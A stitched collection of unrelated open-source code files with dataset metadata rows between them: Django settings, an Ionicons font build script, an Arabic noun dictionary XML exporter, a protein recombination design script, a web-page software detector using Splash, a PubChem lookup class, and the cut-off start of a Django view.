# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Language
LANGUAGES = (
('en', ('English')),
)
# Locale Paths
LOCALE_PATHS = (
# normpath(join(REPO_ROOT, 'locale')),
)
########## END GENERAL CONFIG
########## MEDIA CONFIG
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = normpath(join(PROJECT_ROOT, 'media'))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
########## END MEDIA CONFIG
########## STATIC FILE CONFIG
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
# STATIC_ROOT = normpath(join(PROJECT_ROOT, 'assets'))
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
normpath(join(PROJECT_ROOT, 'static')),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
########## END STATIC FILE CONFIG
########## SECRET CONFIG
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'SECRET_KEY'
########## END SECRET CONFIG
########## TEMPLATE CONFIG
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
)
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
normpath(join(PROJECT_ROOT, 'templates')),
)
########### END TEMPLATE CONFIG
########### MIDDLEWARE CONFIG
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########### END MIDDLEWARE CONFIG
########### URL CONFIG
ROOT_URLCONF = '%s.urls' % SITE_NAME
########### END URL CONFIG
########## WSGI CONFIG
WSGI_APPLICATION = '{{cookiecutter.project_name}}.wsgi.application'
########## END WSGI CONFIG
########## AUTHENTICATION_BACKENDS
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
########## END AUTHENTICATION_BACKENDS
########## APPS CONFIG
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'django.contrib.humanize', # Useful template tags:
# Admin Panel and Admin docs
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Migrations
)
LOCAL_APPS = (
)
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
########## END APPS CONFIG
########## LOGGING CONFIG
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIG
|
mit
| -3,837,163,642,000,832,500
| 28.548523
| 88
| 0.684135
| false
| 3.717091
| true
| false
| false
|
northDacoder/angular_ionic_project
|
ionicons-1.4.1/builder/generate.py
|
1
|
7596
|
from subprocess import call
import os
import json
BUILDER_PATH = os.path.dirname(os.path.abspath(__file__))
ROOT_PATH = os.path.join(BUILDER_PATH, '..')
FONTS_FOLDER_PATH = os.path.join(ROOT_PATH, 'fonts')
CSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'css')
SCSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'scss')
def main():
generate_font_files()
data = get_build_data()
rename_svg_glyph_names(data)
generate_scss(data)
generate_cheatsheet(data)
generate_component_json(data)
generate_composer_json(data)
generate_bower_json(data)
def generate_font_files():
print "Generate Fonts"
cmd = "fontforge -script %s/scripts/generate_font.py" % (BUILDER_PATH)
call(cmd, shell=True)
def rename_svg_glyph_names(data):
# hacky and slow (but safe) way to rename glyph-name attributes
svg_path = os.path.join(FONTS_FOLDER_PATH, 'ionicons.svg')
svg_file = open(svg_path, 'r+')
svg_text = svg_file.read()
svg_file.seek(0)
for ionicon in data['icons']:
# uniF2CA
org_name = 'uni%s' % (ionicon['code'].replace('0x', '').upper())
ion_name = 'ion-%s' % (ionicon['name'])
svg_text = svg_text.replace(org_name, ion_name)
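        # e.g. an icon whose code is 0xf2ca appears in the generated SVG as glyph
        # 'uniF2CA' and is renamed here to 'ion-<name>' so the glyph names match
        # the CSS class names.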
svg_file.write(svg_text)
svg_file.close()
def generate_scss(data):
print "Generate SCSS"
font_name = data['name']
font_version = data['version']
css_prefix = data['prefix']
variables_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-variables.scss')
icons_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-icons.scss')
d = []
d.append('// Ionicons Variables')
d.append('// --------------------------\n')
d.append('$ionicons-font-path: "../fonts" !default;')
d.append('$ionicons-font-family: "%s" !default;' % (font_name) )
d.append('$ionicons-version: "%s" !default;' % (font_version) )
d.append('$ionicons-prefix: %s !default;' % (css_prefix) )
d.append('')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('$ionicon-var-%s: "%s";' % (ionicon['name'], chr_code) )
f = open(variables_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
d = []
d.append('// Ionicons Icons')
d.append('// --------------------------\n')
group = [ '.%s' % (data['name'].lower()) ]
for ionicon in data['icons']:
group.append('.#{$ionicons-prefix}%s' % (ionicon['name']) )
d.append( ',\n'.join(group) )
d.append('{')
d.append(' @extend .ion;')
d.append('}')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('.#{$ionicons-prefix}%s:before { content: $ionicon-var-%s; }' % (ionicon['name'], ionicon['name']) )
f = open(icons_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
generate_css_from_scss(data)
def generate_css_from_scss(data):
print "Generate CSS From SCSS"
scss_file_path = os.path.join(SCSS_FOLDER_PATH, 'ionicons.scss')
css_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.css')
css_min_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.min.css')
cmd = "sass %s %s --style compact" % (scss_file_path, css_file_path)
call(cmd, shell=True)
print "Generate Minified CSS From SCSS"
cmd = "sass %s %s --style compressed" % (scss_file_path, css_min_file_path)
call(cmd, shell=True)
def generate_cheatsheet(data):
print "Generate Cheatsheet"
cheatsheet_file_path = os.path.join(ROOT_PATH, 'cheatsheet.html')
template_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'template.html')
icon_row_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'icon-row.html')
f = open(template_path, 'r')
template_html = f.read()
f.close()
f = open(icon_row_path, 'r')
icon_row_template = f.read()
f.close()
content = []
for ionicon in data['icons']:
css_code = ionicon['code'].replace('0x', '\\')
escaped_html_code = ionicon['code'].replace('0x', '&#x') + ';'
html_code = ionicon['code'].replace('0x', '&#x') + ';'
item_row = icon_row_template
item_row = item_row.replace('{{name}}', ionicon['name'])
item_row = item_row.replace('{{prefix}}', data['prefix'])
item_row = item_row.replace('{{css_code}}', css_code)
item_row = item_row.replace('{{escaped_html_code}}', escaped_html_code)
item_row = item_row.replace('{{html_code}}', html_code)
content.append(item_row)
template_html = template_html.replace("{{font_name}}", data["name"])
template_html = template_html.replace("{{font_version}}", data["version"])
template_html = template_html.replace("{{icon_count}}", str(len(data["icons"])) )
template_html = template_html.replace("{{content}}", '\n'.join(content) )
f = open(cheatsheet_file_path, 'w')
f.write(template_html)
f.close()
def generate_component_json(data):
print "Generate component.json"
d = {
"name": data['name'],
"repo": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"version": data['version'],
"keywords": [],
"dependencies": {},
"development": {},
"license": "MIT",
"styles": [
"css/%s.css" % (data['name'].lower())
],
"fonts": [
"fonts/%s.eot" % (data['name'].lower()),
"fonts/%s.svg" % (data['name'].lower()),
"fonts/%s.ttf" % (data['name'].lower()),
"fonts/%s.woff" % (data['name'].lower())
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
component_file_path = os.path.join(ROOT_PATH, 'component.json')
f = open(component_file_path, 'w')
f.write(txt)
f.close()
def generate_composer_json(data):
print "Generate composer.json"
d = {
"name": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"homepage": "http://ionicons.com/",
"authors": [
{
"name": "Ben Sperry",
"email": "ben@drifty.com",
"role": "Designer",
"homepage": "https://twitter.com/helloimben"
},
{
"name": "Adam Bradley",
"email": "adam@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/adamdbradley"
},
{
"name": "Max Lynch",
"email": "max@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/maxlynch"
}
],
"extra": {},
"license": [ "MIT" ]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
composer_file_path = os.path.join(ROOT_PATH, 'composer.json')
f = open(composer_file_path, 'w')
f.write(txt)
f.close()
def generate_bower_json(data):
print "Generate bower.json"
d = {
"name": data['name'],
"version": data['version'],
"homepage": "https://github.com/driftyco/ionicons",
"authors": [
"Ben Sperry <ben@drifty.com>",
"Adam Bradley <adam@drifty.com>",
"Max Lynch <max@drifty.com>"
],
"description": "Ionicons - free and beautiful icons from the creators of Ionic Framework",
"main": [
"css/%s.css" % (data['name'].lower()),
"fonts/*"
],
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"license": "MIT",
"ignore": [
"**/.*",
"builder",
"node_modules",
"bower_components",
"test",
"tests"
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
bower_file_path = os.path.join(ROOT_PATH, 'bower.json')
f = open(bower_file_path, 'w')
f.write(txt)
f.close()
def get_build_data():
build_data_path = os.path.join(BUILDER_PATH, 'build_data.json')
f = open(build_data_path, 'r')
data = json.loads(f.read())
f.close()
return data
if __name__ == "__main__":
main()
|
mit
| 3,167,289,036,028,404,000
| 27.772727
| 113
| 0.594787
| false
| 2.941905
| false
| false
| false
|
linuxscout/arramooz
|
scripts/nouns/xmldict.py
|
1
|
1996
|
#!/usr/bin/python2
# -*- coding=utf-8 -*-
#************************************************************************
# $Id: generatenoundict.py,v 0.7 2011/03/26 01:10:00 Taha Zerrouki $
#
# ------------
# Description:
# ------------
# Copyright (c) 2011, Arabtechies, Arabeyes Taha Zerrouki
#
# This file is the main file to execute the application in the command line
#
# -----------------
# Revision Details: (Updated by Revision Control System)
# -----------------
# $Date: 2009/06/02 01:10:00 $
# $Author: Taha Zerrouki $
# $Revision: 0.7 $
# $Source: arabtechies.sourceforge.net
#
#***********************************************************************/
import csvdict
import noundict_functions as ndf
class XmlDict(csvdict.CsvDict):
""" a virtual converter of data from table to specific format
the data is big, then every function print string """
def __init__(self, wordtype, version="N/A"):
"""
initiate the dict
"""
csvdict.CsvDict.__init__(self, wordtype, version)
def add_header(self,):
"""
add the header for new dict
"""
line ="""<?xml version='1.0' encoding='utf8'?>\n"""
line += "<!--" + "-->\n<!--".join(self.headerlines) + "-->\n"
line += "<dictionary>"
return line
def add_record(self, noun_row):
"""
Add a new to the dict
"""
fields = self.treat_tuple(noun_row)
line="<noun id='%d'>\n"%self.id;
for k in range(len(self.display_order)):
key = self.display_order[k];
if self.display_order[k] != "id":
if fields[key]:
line+=u" <%s>%s</%s>\n"%(key,fields[key],key);
else:
line+=u" <%s/>\n"%(key);
line+=u"</noun>\n";
return line
def add_footer(self):
"""close the data set, used for ending xml, or sql"""
return "</dictionary>"
|
gpl-2.0
| 393,406,699,130,314,700
| 30.68254
| 76
| 0.477455
| false
| 3.635701
| false
| false
| false
|
mattasmith/Non-contiguous-recombination
|
ncr.py
|
1
|
5343
|
#! /usr/local/bin/python
"""Script for designing a set of non-contiguous recombination libraries for site-directed, structure-guided homologous recombination.
******************************************************************
Copyright (C) 2011 Matt Smith, California Institute of Technology
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*******************************************************************
SCHEMA and non-contiguous recombination were developed in the laboratory of Frances H. Arnold at the California Institute of Technology.
References:
Smith, M.A. et al., Chimeragenesis of distantly-related proteins by non-contiguous recombination, Protein Science 22(2):231-238 (2013).
Voigt, C.A. et al., Protein building blocks preserved by recombination, Nature Structural Biology 9(7):553-558 (2002).
Karypis, G. et al., Multilevel Hypergraph Partitioning: Applications in VLSI Domain, 34th Design and Automation Conference, 526-529, (1997).
Karypis, G. et al., Multilevel k-way Hypergraph Partitioning, 36th Design Automation Conference, 343-348, 1999.
Edgar, R.C., MUSCLE: multiple sequence alignment with high accuracy and high throughput, Nucleic Acids Research 32(5), 1792-97.
"""
from subprocess import Popen
from sys import exit
from sys import path
path.append('./tools')
import os
from make_alignment_and_contacts2 import make_alignment_and_contacts2
from run_shmetis import run_shmetis
from PDB_tools import split_into_chains
## information about non-contiguous recombination
print('\n********************* Non-contiguous recombination *********************\n')
print('Written by Matt Smith, 2011.\n')
print('SCHEMA and non-contiguous recombination were developed in the \nlaboratory of Frances H. Arnold at the California Institute of Technology.\n')
## check the files are there
if os.path.isfile('alignment.fasta') == False:
exit('Error: cannot find \'alignment.fasta\' alignment file')
if os.path.isfile('init.txt') == False:
exit('Error: cannot find \'init.txt\' setup file.')
if os.path.isdir('./tools') == False:
exit('Error: the non-contiguous recombination tools are missing')
if len([f for f in os.listdir('./tools/muscle') if 'muscle' in f])==0:
exit('Error: cannot find MUSCLE in \'tools/muscle\'')
if len([f for f in os.listdir('./tools/muscle') if 'muscle' in f])>1:
exit('Error: please provide just one MUSCLE executable in \'tools/muscle\'')
if len([f for f in os.listdir('./tools') if 'hmetis' in f])==0:
exit('Error: cannot find hmetis package in \'tools\'')
if len([f for f in os.listdir('./tools') if 'hmetis-1.5' in f])>1:
exit('Error: please provide just one hmetis package in \'tools\'')
## load in the initial file
data = [s for s in open('init.txt').read().split('\n') if (len(s)>0 and s[0]!='#')]
for i,datum in enumerate(data):
if 'Number of blocks' in datum.split(' = ')[0]:
numberofblocks_str = datum.split(' = ')[1]
if '-' in numberofblocks_str:
numberofblocks_min = int(numberofblocks_str.split('-')[0])
numberofblocks_max = int(numberofblocks_str.split('-')[1])
else:
numberofblocks_min = int(numberofblocks_str)
numberofblocks_max = int(numberofblocks_str)
if 'Find all PDB structures' in datum.split(' = ')[0]:
searchPDB = int(datum.split(' = ')[1])
# end for i, datum
## find the muscle version
muscle_file = [f for f in os.listdir('./tools/muscle') if 'muscle' in f]
muscle_version = muscle_file[0]
## find the hmetis version
hmetis_file = [f for f in os.listdir('./tools') if 'hmetis-1.5' in f]
hmetis_version = hmetis_file[0]
## download all available structures or check user pdb files
if searchPDB == 1:
Popen('python ./tools/search_download_save.py',shell=True).wait()
else:
if os.path.isdir('./structures') == False:
exit('Error: you need to provide at least one pdb in a folder called \'structures\'')
elif len([f for f in os.listdir('./structures') if os.path.splitext(f)[-1].lower() == '.pdb'])==0:
exit('Error: there are no pdbs in \'structures\'')
else:
print('Structures provided by user:')
structurefilelist = os.listdir('./structures')
for filename in structurefilelist:
if os.path.splitext(filename)[-1].lower() == '.pdb':
print filename
split_into_chains(filename,'./structures/')
## create the contact maps - one for each parent (if the parent has a structure)
num_contact_maps = make_alignment_and_contacts2(muscle_version)
## formulate and solve with graph partitioning
print ('\nDesigning libraries...')
run_success = run_shmetis(num_contact_maps, numberofblocks_min, numberofblocks_max, hmetis_version)
## done!
|
gpl-3.0
| -7,719,600,997,329,283,000
| 46.283186
| 149
| 0.678271
| false
| 3.571524
| false
| false
| false
|
spectresearch/detectem
|
detectem/response.py
|
1
|
6146
|
import base64
import json
import logging
import re
import urllib.parse
from string import Template
import pkg_resources
import requests
from detectem.exceptions import SplashError
from detectem.settings import SPLASH_TIMEOUT, SPLASH_URL
from detectem.utils import docker_container
DEFAULT_CHARSET = "iso-8859-1"
ERROR_STATUS_CODES = [400, 504]
logger = logging.getLogger("detectem")
def is_url_allowed(url):
""" Return ``True`` if ``url`` is not in ``blacklist``.
:rtype: bool
"""
blacklist = [
r"\.ttf",
r"\.woff",
r"fonts\.googleapis\.com",
r"\.png",
r"\.jpe?g",
r"\.gif",
r"\.svg",
]
for ft in blacklist:
if re.search(ft, url):
return False
return True
def is_valid_mimetype(response):
""" Return ``True`` if the mimetype is not blacklisted.
:rtype: bool
"""
blacklist = ["image/"]
mimetype = response.get("mimeType")
if not mimetype:
return True
for bw in blacklist:
if bw in mimetype:
return False
return True
def get_charset(response):
""" Return charset from ``response`` or default charset.
:rtype: str
"""
# Set default charset
charset = DEFAULT_CHARSET
m = re.findall(r";charset=(.*)", response.get("mimeType", ""))
if m:
charset = m[0]
return charset
def create_lua_script(plugins):
""" Return script template filled up with plugin javascript data.
:rtype: str
"""
lua_template = pkg_resources.resource_string("detectem", "script.lua")
template = Template(lua_template.decode("utf-8"))
javascript_data = to_javascript_data(plugins)
return template.substitute(js_data=json.dumps(javascript_data))
def to_javascript_data(plugins):
"""
    Return a list of dictionaries, one per plugin, with its JavaScript (DOM) matchers. Quotes are escaped.
    :rtype: list
"""
def escape(v):
return re.sub(r'"', r'\\"', v)
def dom_matchers(p):
dom_matchers = p.get_matchers("dom")
escaped_dom_matchers = []
for dm in dom_matchers:
check_statement, version_statement = dm
escaped_dom_matchers.append(
{
"check_statement": escape(check_statement),
# Escape '' and not None
"version_statement": escape(version_statement or ""),
}
)
return escaped_dom_matchers
return [
{"name": p.name, "matchers": dom_matchers(p)}
for p in plugins.with_dom_matchers()
]
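# Hedged sketch of the returned structure (the plugin name and matcher statements are
# invented for illustration): a plugin whose DOM matchers contain the tuple
# ("window.jQuery", "window.jQuery.fn.jquery") would be rendered roughly as
#   [{"name": "jquery",
#     "matchers": [{"check_statement": "window.jQuery",
#                   "version_statement": "window.jQuery.fn.jquery"}]}]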
def get_response(url, plugins, timeout=SPLASH_TIMEOUT):
"""
    Return response with HAR, inline scripts and software detected by JS matchers.
:rtype: dict
"""
lua_script = create_lua_script(plugins)
lua = urllib.parse.quote_plus(lua_script)
page_url = f"{SPLASH_URL}/execute?url={url}&timeout={timeout}&lua_source={lua}"
try:
with docker_container():
logger.debug("[+] Sending request to Splash instance")
res = requests.get(page_url)
except requests.exceptions.ConnectionError:
raise SplashError("Could not connect to Splash server {}".format(SPLASH_URL))
logger.debug("[+] Response received")
json_data = res.json()
if res.status_code in ERROR_STATUS_CODES:
raise SplashError(get_splash_error(json_data))
softwares = json_data["softwares"]
scripts = json_data["scripts"].values()
har = get_valid_har(json_data["har"])
js_error = get_evaljs_error(json_data)
if js_error:
logger.debug("[+] WARNING: failed to eval JS matchers: %(n)s", {"n": js_error})
else:
logger.debug("[+] Detected %(n)d softwares from the DOM", {"n": len(softwares)})
logger.debug("[+] Detected %(n)d scripts from the DOM", {"n": len(scripts)})
logger.debug("[+] Final HAR has %(n)d valid entries", {"n": len(har)})
return {"har": har, "scripts": scripts, "softwares": softwares}
def get_splash_error(json_data):
msg = json_data["description"]
if "info" in json_data and "error" in json_data["info"]:
error = json_data["info"]["error"]
if error.startswith("http"):
msg = "Request to site failed with error code {0}".format(error)
elif error.startswith("network"):
# see http://doc.qt.io/qt-5/qnetworkreply.html
qt_errors = {
"network1": "ConnectionRefusedError",
"network2": "RemoteHostClosedError",
"network3": "HostNotFoundError",
"network4": "TimeoutError",
"network5": "OperationCanceledError",
"network6": "SslHandshakeFailedError",
}
error = qt_errors.get(error, "error code {0}".format(error))
msg = "Request to site failed with {0}".format(error)
else:
msg = "{0}: {1}".format(msg, error)
return msg
def get_evaljs_error(json_data):
error = None
if "errors" in json_data and "evaljs" in json_data["errors"]:
res = json_data["errors"]["evaljs"]
if isinstance(res, str):
m = re.search(r"'message': '(.*?)'[,}]", res)
if m:
error = bytes(m.group(1), "utf-8").decode("unicode_escape")
return error
def get_valid_har(har_data):
""" Return list of valid HAR entries.
:rtype: list
"""
new_entries = []
entries = har_data.get("log", {}).get("entries", [])
logger.debug("[+] Detected %(n)d entries in HAR", {"n": len(entries)})
for entry in entries:
url = entry["request"]["url"]
if not is_url_allowed(url):
continue
response = entry["response"]["content"]
if not is_valid_mimetype(response):
continue
if response.get("text"):
charset = get_charset(response)
response["text"] = base64.b64decode(response["text"]).decode(charset)
else:
response["text"] = ""
new_entries.append(entry)
logger.debug("[+] Added URL: %(url)s ...", {"url": url[:100]})
return new_entries
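# Hedged, self-contained smoke test (synthetic HAR data, not part of the original
# module): running this file directly exercises the filtering helpers above
# without needing a Splash instance.
if __name__ == "__main__":
    fake_har = {
        "log": {
            "entries": [
                {
                    "request": {"url": "http://example.org/app.js"},
                    "response": {
                        "content": {
                            "mimeType": "text/javascript;charset=utf-8",
                            "text": base64.b64encode(b"var x = 1;").decode("ascii"),
                        }
                    },
                },
                {
                    "request": {"url": "http://example.org/logo.png"},
                    "response": {"content": {"mimeType": "image/png"}},
                },
            ]
        }
    }
    # Only the first entry should survive: the .png URL is filtered out.
    for entry in get_valid_har(fake_har):
        print(entry["request"]["url"], repr(entry["response"]["content"]["text"]))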
|
mit
| 6,745,631,188,370,809,000
| 25.606061
| 88
| 0.582981
| false
| 3.718088
| false
| false
| false
|
ihoru/play_with_python
|
tasks/test_django/test_django/settings.py
|
1
|
3502
|
"""
Django settings for test_django project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=0033co1(k8giglasb-&0-_5d%fbp*pfsa-u0173w4eb60clo3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'quiz',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'test_django.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'test_django.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'ENGINE': 'django.db.backends.mysql',
'NAME': 'test_django',
'USER': 'ihoru',
'PASSWORD': '',
'HOST': '127.0.0.1',
'PORT': '3306',
'OPTIONS': {
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'",
},
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'Europe/Moscow'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
mit
| 7,435,446,665,208,901,000
| 26.793651
| 91
| 0.669903
| false
| 3.488048
| false
| false
| false
|
SuLab/scheduled-bots
|
scheduled_bots/drugs/pubchem.py
|
1
|
3162
|
"""
Note: this is a really abbreviated version of sebastian's full pubchem bot
that simply gets the pubchem ID from an inchikey
Adapted from: https://github.com/sebotic/cdk_pywrapper/blob/master/cdk_pywrapper/chemlib.py
"""
import json
import time
import requests
import wikidataintegrator.wdi_core as wdi_core
class PubChemMolecule(object):
headers = {
'accept': 'application/json',
'content-type': 'application/json',
'charset': 'utf-8'
}
base_url = 'http://pubchem.ncbi.nlm.nih.gov/rest/rdf/{}'
def __init__(self, cid=None, inchi_key=None):
if cid:
self.cid = cid
if inchi_key:
self.stdinchikey = inchi_key
if cid:
pass
elif inchi_key:
cids = self._retrieve_pubchem_cids(self.stdinchikey)
if len(cids) == 0:
raise ValueError('InChI key not found in PubChem!')
if len(cids) == 1:
self.cid = cids[0]
else:
raise ValueError('More than one result: {}'.format(cids))
@staticmethod
def _retrieve_basic_compound_info(cid):
cmpnd_url = 'https://pubchem.ncbi.nlm.nih.gov/rest/rdf/compound/{}.json'.format(cid)
print(cmpnd_url)
# r = PubChemMolecule.s.get(cmpnd_url, headers=PubChemMolecule.headers).json()
r = requests.get(cmpnd_url, headers=PubChemMolecule.headers).json()
return r
@staticmethod
def _retrieve_pubchem_cids(ikey):
url = 'http://pubchem.ncbi.nlm.nih.gov/rest/rdf/inchikey/{}.json'.format(ikey)
try:
# r = PubChemMolecule.s.get(url, headers=PubChemMolecule.headers).json()
r = requests.get(url, headers=PubChemMolecule.headers).json()
except json.JSONDecodeError as e:
# print(e.__str__())
print('PubChem does not have this InChI key', ikey)
return []
cids = list()
if 'http://semanticscience.org/resource/is-attribute-of' in r['inchikey/{}'.format(ikey)]:
for x in r['inchikey/{}'.format(ikey)]['http://semanticscience.org/resource/is-attribute-of']:
cids.append(x['value'].split('/')[-1])
return cids
@property
def label(self):
return None
def to_wikidata(self):
refs = [[
wdi_core.WDItemID(value='Q278487', prop_nr='P248', is_reference=True), # stated in
wdi_core.WDExternalID(value=self.cid, prop_nr='P662', is_reference=True), # source element
wdi_core.WDTime(time=time.strftime('+%Y-%m-%dT00:00:00Z'), prop_nr='P813', is_reference=True) # retrieved
]]
elements = {
'P662': self.cid[3:]
}
data = []
for k, v in elements.items():
if not v:
continue
print('{}:'.format(k), v)
if isinstance(v, list) or isinstance(v, set):
for x in v:
data.append(wdi_core.WDString(prop_nr=k, value=x, references=refs))
else:
data.append(wdi_core.WDString(prop_nr=k, value=v, references=refs))
return data
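# Hedged usage sketch (not part of the original bot). It requires network access to
# PubChem and the wikidataintegrator package; the InChI key below is aspirin's and
# is used purely as an illustration.
if __name__ == "__main__":
    mol = PubChemMolecule(inchi_key="BSYNRYMUTXBXSQ-UHFFFAOYSA-N")
    print(mol.cid)  # expected to look like "CID2244"
    for statement in mol.to_wikidata():
        print(statement)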
|
mit
| 5,386,451,797,409,121,000
| 30.939394
| 118
| 0.57432
| false
| 3.335443
| false
| false
| false
|
protwis/protwis
|
similaritysearch/views.py
|
1
|
5740
|
from django.shortcuts import render, redirect
from django.conf import settings
from common.views import AbsReferenceSelection
from common.views import AbsSegmentSelection
#from common.views import AbsTargetSelection
from common.views import AbsTargetSelectionTable
# from common.alignment_SITE_NAME import Alignment
Alignment = getattr(__import__('common.alignment_' + settings.SITE_NAME, fromlist=['Alignment']), 'Alignment')
from collections import OrderedDict
class ReferenceSelection(AbsReferenceSelection):
step = 1
number_of_steps = 3
target_input = False
docs = 'sequences.html#similarity-search-gpcrdb'
buttons = {
'continue': {
